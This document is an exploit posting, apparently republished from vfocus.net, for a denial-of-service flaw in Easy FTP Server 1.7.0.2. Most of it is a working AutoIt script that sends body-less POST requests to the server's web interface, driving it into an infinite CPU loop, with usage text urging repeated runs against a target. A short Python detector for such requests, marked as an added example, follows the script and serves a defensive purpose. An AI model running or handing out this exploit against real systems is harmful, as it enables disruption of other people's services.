Easy FTP Server 1.7.0.2 Denial Of Service
Source: vfocus.net  Author: Akastep  Published: 2013-04-08
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=smdcpu.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <String.au3>

#cs

easyftpsvr-1.7.0.2 CPU consumption exploit.
The vulnerability is due easyftpsvr-1.7.0.2 's web interface (Easy-Web Server/1.0) contains flaw when accepting
POST requests with EMPTY body.
In this case application runs into infinite loop and consumes very high CPU usage.
Running following exploit 2-3 times against target machine that runs easyftpsvr-1.7.0.2 (against it native web interface called Easy-Web Server/1.0) consumes high CPU usage.

---------------- Be Careful! -----------------
*DO not run it against your real machine.(Instead of use Virtualbox)*
Otherwise hard reboot is your best friend.
Demo vid: http://youtu.be/fq1ebZGkoJM
------------------------------------------------
/AkaStep
#ce

Opt("MustDeclareVars", 1)

Global $INVALIDIP='INVALID IP FORMAT';
Global $INVALIDPORT='INVALID PORT NUMBER!';
Global $f=_StringRepeat('#',10);
Global $msg_usage=$f & ' easyftpsvr-1.7.0.2 CPU consumption exploit ' & StringMid($f,1,7) & @CRLF & _
$f & " Usage: " & _
@ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10) & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')

if $CmdLine[0]=0 Then
MsgBox(64,"easyftpsvr-1.7.0.2 CPU consumption exploit","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf

if $CmdLine[0] <> 2 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf

ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);

Global $ipaddr=StringMid($CmdLine[1],1,15);//255.255.255.255
Global $port=StringMid($CmdLine[2],1,5);//65535
Global $useragent='Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0';
Global $reqmethod='POST';
global $root_dir='/';
Global $thisconsumes='';//<=This is a reason of High CPU consumption. Empty POST body causes application to run into infinite loop//

Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $ipaddr,$port)
Global $hRequest = _WinHttpOpenRequest($hConnect,$reqmethod,$root_dir,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" & @CRLF)
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5"& @CRLF)
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate"& @CRLF)
_WinHttpAddRequestHeaders($hRequest, "DNT: 1"& @CRLF)
_WinHttpAddRequestHeaders($hRequest, "Connection: close"& @CRLF)
_WinHttpSendRequest($hRequest, -1, $thisconsumes);// send empty POST body.//

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
$sReturned &= _WinHttpReadData($hRequest)
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
EndIf

ConsoleWrite(_StringRepeat('#',62) & @CRLF & _StringRepeat(' ',10) &' PACKET WAS SENT! ' & _StringRepeat(' ',10) & @CRLF & _StringRepeat('#',62));
ConsoleWrite(@CRLF & $f & ' Run this exploit 2-3 times against target it will consume CPU deadly. ' & $f & @CRLF);
Exit;
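
A defender's view of the request described in the script's comment block, as an added example that is not part of the original advisory or the author's code: it parses captured raw HTTP requests and reports source addresses that repeatedly send POST requests with no body. The function names, the repeat threshold of 2 (taken from the "2-3 times" remark above) and all sample requests are assumptions constructed for illustration.

```python
# Added example: detect repeated body-less POST requests in captured HTTP traffic.
# All names and sample data here are constructed for illustration.
from collections import Counter

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers, body

def is_empty_post(raw: bytes) -> bool:
    """True for a POST whose declared and actual body length are both zero."""
    method, headers, body = parse_request(raw)
    if method != "POST":
        return False
    # A missing Content-Length is treated as a declared length of zero.
    declared = headers.get("content-length", "0")
    if not declared.isdigit():
        return False  # malformed length: out of scope for this rule
    return int(declared) == 0 and len(body) == 0

def sources_to_alert(events, threshold=2):
    """events: iterable of (src_ip, raw_request); returns IPs with >= threshold hits."""
    hits = Counter(src for src, raw in events if is_empty_post(raw))
    return sorted(ip for ip, n in hits.items() if n >= threshold)

# Constructed sample capture (documentation address ranges only).
EMPTY_POST = (b"POST / HTTP/1.1\r\nHost: 192.0.2.10\r\n"
              b"Content-Length: 0\r\nConnection: close\r\n\r\n")
NORMAL_POST = (b"POST /login HTTP/1.1\r\nHost: 192.0.2.10\r\n"
               b"Content-Length: 7\r\n\r\nuser=me")
GET_REQUEST = b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
SAMPLE_EVENTS = [
    ("198.51.100.7", EMPTY_POST), ("198.51.100.7", EMPTY_POST),
    ("203.0.113.5", NORMAL_POST), ("203.0.113.5", GET_REQUEST),
    ("203.0.113.9", EMPTY_POST),
]

if __name__ == "__main__":
    print(sources_to_alert(SAMPLE_EVENTS))
```

The same predicate can serve as a filtering rule in a reverse proxy placed in front of the web interface, so that body-less POST requests never reach it.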

 